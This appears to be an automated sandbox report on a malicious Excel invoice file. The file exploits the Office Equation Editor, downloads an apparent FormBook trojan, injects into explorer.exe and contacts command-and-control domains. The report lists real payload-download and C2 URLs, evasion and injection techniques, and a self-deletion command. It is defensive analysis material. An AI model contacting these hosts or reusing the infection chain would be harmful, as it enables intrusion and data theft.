          Source: vbc.exe, 00000004.00000002.995482654.0000000000964000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
          Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&00000000
          Source: explorer.exe, 00000007.00000000.1002709372.000000000037B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.08tp
          Source: explorer.exe, 00000007.00000000.995370512.0000000004423000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0e
          Source: explorer.exe, 00000007.00000000.995128220.000000000434F000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0Q
          Source: explorer.exe, 00000007.00000000.1074423275.00000000043F0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: v6nel\5&35c44269e\cdromnvmware_sata_
          Source: explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}(
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B1D2C _memset,IsDebuggerPresent,5_2_013B1D2C
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,5_2_013B558A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B1D17 GetProcessHeap,5_2_013B1D17
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_00408E70 rdtsc 6_2_00408E70
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process token adjusted: Debug
          Source: C:\Windows\SysWOW64\wuapp.exe | Process token adjusted: Debug
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_036D0559 mov edx, dword ptr fs:[00000030h] 2_2_036D0559
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_001103F8 mov eax, dword ptr fs:[00000030h] 5_2_001103F8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_0011061D mov eax, dword ptr fs:[00000030h] 5_2_0011061D
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_001106F7 mov eax, dword ptr fs:[00000030h] 5_2_001106F7
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_00110736 mov eax, dword ptr fs:[00000030h] 5_2_00110736
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_00110772 mov eax, dword ptr fs:[00000030h] 5_2_00110772
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_008726F8 mov eax, dword ptr fs:[00000030h] 6_2_008726F8
          Source: C:\Windows\SysWOW64\wuapp.exe | Code function: 8_2_01EB26F8 mov eax, dword ptr fs:[00000030h] 8_2_01EB26F8
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process queried: DebugPort
          Source: C:\Windows\SysWOW64\wuapp.exe | Process queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_0040A0E0 LdrLoadDll,6_2_0040A0E0
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B439B SetUnhandledExceptionFilter,5_2_013B439B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_013B43CC
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_013B439B SetUnhandledExceptionFilter,6_2_013B439B
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 6_2_013B43CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_013B43CC

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Windows\explorer.exe | Network Connect: 23.81.214.26 80
          Source: C:\Windows\explorer.exe | Domain query: www.arjimni.com
          Source: C:\Windows\explorer.exe | Domain query: www.tw-life.net
          Source: C:\Windows\explorer.exe | Domain query: www.contractornurd.com
          Source: C:\Windows\explorer.exe | Domain query: www.yiwanggkm.com
          Source: C:\Windows\explorer.exe | Network Connect: 164.155.217.57 80
          Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.212 80
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Section unmapped: C:\Windows\SysWOW64\wuapp.exe base address: 8E0000
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wuapp.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\wuapp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\wuapp.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Memory written: C:\Users\user\AppData\Local\Temp\yldnat.exe base: 400000 value starts with: 4D5A
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Thread APC queued: target process: C:\Windows\explorer.exe
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Thread register set: target process: 1860
          Source: C:\Windows\SysWOW64\wuapp.exe | Thread register set: target process: 1860
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
          Source: C:\Users\Public\vbc.exe | Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Process created: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna
          Source: C:\Windows\SysWOW64\wuapp.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\AppData\Local\Temp\yldnat.exe"
          Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
          Source: explorer.exe, 00000007.00000000.1003147804.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.988533014.0000000000830000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.1014113528.0000000000830000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program Manager<
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B3283 cpuid 5_2_013B3283
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: C:\Users\user\AppData\Local\Temp\yldnat.exe | Code function: 5_2_013B3EC8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,5_2_013B3EC8
          Source: C:\Users\Public\vbc.exe | Code function: 4_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,4_2_00403646

          Stealing of Sensitive Information

          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

          Remote Access Functionality

          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.yldnat.exe.120000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.2.yldnat.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 6.0.yldnat.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000008.00000002.1175423013.00000000001C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175517654.0000000000270000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.983399787.0000000000120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.982109510.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1012975505.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032166526.0000000000240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032215807.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000008.00000002.1175360038.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000007.00000000.1024425011.000000000B8A4000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000002.1032081329.00000000000C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.981158681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK matrix (one line per tactic column; the number in parentheses is the count of matching signatures shown on the matrix cell):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Scripting (1); Native API (11); Shared Modules (1); Exploitation for Client Execution (23); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Access Token Manipulation (1); Process Injection (612); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (111); Virtualization/Sandbox Evasion (2); Access Token Manipulation (1); Process Injection (612); Deobfuscate/Decode Files or Information (1); Scripting (1); Obfuscated Files or Information (2); Software Packing (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery (1); Security Software Discovery (251); Virtualization/Sandbox Evasion (2); Process Discovery (2); Remote System Discovery (1); File and Directory Discovery (2); System Information Discovery (116); Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data (1); Clipboard Data (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Ingress Tool Transfer (35); Non-Application Layer Protocol (3); Application Layer Protocol (123); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot (1); Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
Behavior Graph ID: 626601
Sample: DL03327INV.xlsx
Start date: 14/05/2022
Architecture: WINDOWS
Score: 100

Top-level DNS/IP info:
• www.skinclash.com
• traff-6.hugedomains.com
• hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com
Top-level signatures:
• Snort IDS alert for network traffic
• Found malware configuration
• Malicious sample detected (through community Yara rule)
• 12 other signatures

Process tree (figures in parentheses are the created-files / registry-value counters shown on the graph node):

EQNEDT32.EXE (12), started
• DNS/IP: 104.168.33.31, 49173, 80, AS-COLOCROSSINGUS, United States
• Dropped: C:\Users\user\AppData\Local\...\vbc[1].exe, PE32
• Dropped: C:\Users\Public\vbc.exe, PE32
• Signature: Office equation editor establishes network connection
• Signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
  vbc.exe (19), started by EQNEDT32.EXE
  • Dropped: C:\Users\user\AppData\Local\Temp\yldnat.exe, PE32
  • Signature: Multi AV Scanner detection for dropped file
  • Signature: Machine Learning detection for dropped file
    yldnat.exe, started by vbc.exe
    • Signature: Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
    • Signature: Tries to detect virtualization through RDTSC time measurements
    • Signature: Injects a PE file into a foreign processes
      yldnat.exe, started by yldnat.exe
      • Signature: Modifies the context of a thread in another process (thread injection)
      • Signature: Maps a DLL or memory area into another process
      • Signature: Sample uses process hollowing technique
      • Signature: Queues an APC in another process (thread injection)
        explorer.exe, injected by yldnat.exe
        • DNS/IP: www.yiwanggkm.com 23.81.214.26, 49177, 80, LEASEWEB-USA-SEA-10US, United States
        • DNS/IP: www.tw-life.net 164.155.217.57, 49176, 80, IKGUL-26484US, South Africa
        • DNS/IP: 4 other IPs or domains
        • Signature: System process connects to network (likely due to code injection or exploit)
          wuapp.exe, started by explorer.exe
          • Signature: Modifies the context of a thread in another process (thread injection)
          • Signature: Maps a DLL or memory area into another process
          • Signature: Tries to detect virtualization through RDTSC time measurements
            cmd.exe, started by wuapp.exe

EXCEL.EXE (34, 26), started
• Dropped: C:\Users\user\Desktop\~$DL03327INV.xlsx, data

Antivirus detection, submitted file:
Source | Detection | Scanner | Label
DL03327INV.xlsx | 38% | Virustotal | -
DL03327INV.xlsx | 27% | ReversingLabs | Document-OLE.Exploit.CVE-2018-0802
Antivirus detection, dropped files:
Source | Detection | Scanner | Label
C:\Users\Public\vbc.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe | 51% | ReversingLabs | Win32.Trojan.FormBook
C:\Users\Public\vbc.exe | 51% | ReversingLabs | Win32.Trojan.FormBook
Antivirus detection, unpacked PE files:
Source | Detection | Scanner | Label
6.2.yldnat.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
5.2.yldnat.exe.120000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
2.3.EQNEDT32.EXE.6af7ba.0.unpack | 100% | Avira | TR/Patched.Ren.Gen
6.0.yldnat.exe.400000.9.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.0.yldnat.exe.400000.5.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
6.0.yldnat.exe.400000.7.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
Antivirus detection, domains:
Source | Detection | Scanner | Label
www.tw-life.net | 0% | Virustotal | -
Antivirus detection, URLs:
Source | Detection | Scanner | Label
http://www.yiwanggkm.com/nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh | 0% | Avira URL Cloud | safe
http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
http://www.tw-life.net/nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh | 0% | Avira URL Cloud | safe
www.arjimni.com/nc39/ | 100% | Avira URL Cloud | malware
http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh | 100% | Avira URL Cloud | malware
http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
http://104.168.33.31/75/vbc.exehhC: | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://treyresearch.net | 0% | URL Reputation | safe
http://java.sun.com | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://104.168.33.31/75/vbc.exe | 100% | Avira URL Cloud | malware
http://104.168.33.31/75/vbc.exej | 0% | Avira URL Cloud | safe
http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh | 100% | Avira URL Cloud | malware
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
Domains:
Name | IP | Active | Malicious | Antivirus Detection | Reputation
www.tw-life.net | 164.155.217.57 | true | true | - | unknown
parkingpage.namecheap.com | 198.54.117.212 | true | false | - | high
www.yiwanggkm.com | 23.81.214.26 | true | true | - | unknown
hdr-nlb10-d66bbad0736f8259.elb.us-east-2.amazonaws.com | 18.119.154.66 | true | false | - | high
arjimni.com | 34.102.136.180 | true | false | - | unknown
www.arjimni.com | unknown | unknown | true | - | unknown
www.contractornurd.com | unknown | unknown | true | - | unknown
www.skinclash.com | unknown | unknown | true | - | unknown
Contacted URLs:
Name | Malicious | Antivirus Detection | Reputation
http://www.yiwanggkm.com/nc39/?dZzp=SW2DOu4AoD1tt2PaEEhiNvSk2qD2OpQeAcSR0NEUE8SsNGniN/+F24NqGXKX7Cj1ljS/6Q==&3f=j6AdrVwh | true | Avira URL Cloud: safe | unknown
http://www.tw-life.net/nc39/?dZzp=Td3Z6WACWlvn2oxJ5kz3cAAvTYM+vx9a0mv4ko18Io/mhbtUurGZKYFJi0A4+N8FDsGh8g==&3f=j6AdrVwh | true | Avira URL Cloud: safe | unknown
www.arjimni.com/nc39/ | true | Avira URL Cloud: malware | low
http://www.arjimni.com/nc39/?dZzp=SWFeU2CogosqNHNVddu3ZSSiHhx9YO5iIr2cqOlbYRvwZbqC6rJ+ufxHmetPGTnqGTEg+w==&3f=j6AdrVwh | false | Avira URL Cloud: malware | unknown
http://104.168.33.31/75/vbc.exe | true | Avira URL Cloud: malware | unknown
http://www.contractornurd.com/nc39/?dZzp=CWrF3poHj2MNQw4FqfZfOWFDC9Dy9qwGAafxJUMNhkwMJpF8RUBmV1WHKbaf9sKHKobluA==&3f=j6AdrVwh | true | Avira URL Cloud: malware | unknown
URLs found in memory and binary data:
Name | Source | Malicious | Antivirus Detection | Reputation
http://www.windows.com/pctv. | explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://investor.msn.com | explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.iis.fhg.de/audioPA | explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.piriform.com/ccleanerq | explorer.exe, 00000007.00000000.1015998007.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1071039162.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.992782338.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1004984463.0000000002CBF000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleaner1SPS0 | explorer.exe, 00000007.00000000.1011703149.0000000008611000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000245149.0000000008611000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://104.168.33.31/75/vbc.exehhC: | EQNEDT32.EXE, 00000002.00000002.971169653.000000000061F000.00000004.00000020.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
http://nsis.sf.net/NSIS_ErrorError | vbc.exe, 00000004.00000000.968426551.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, vbc[1].exe.2.dr | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.hotmail.com/oe | explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://treyresearch.net | explorer.exe, 00000007.00000000.1019001210.00000000046D0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://java.sun.com | explorer.exe, 00000007.00000000.1002666378.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1013668691.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.987463159.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069523800.0000000000335000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.icra.org/vocabulary/. | explorer.exe, 00000007.00000000.1005695015.0000000003CF7000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | explorer.exe, 00000007.00000000.1070008053.0000000001DD0000.00000002.00000001.00040000.00000000.sdmp | false | - | high
http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.1022834782.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023411873.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1000541349.000000000869E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1023540631.0000000008807000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1018121045.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1074287002.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.999862011.0000000008512000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1069574104.00000000003A6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.995167898.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1007078757.0000000004385000.00000004.00000001.00020000.00000000.sdmp | false | - | high
http://investor.msn.com/ | explorer.exe, 00000007.00000000.993545742.0000000003B10000.00000002.00000001.00040000.00000000.sdmp | false | - | high
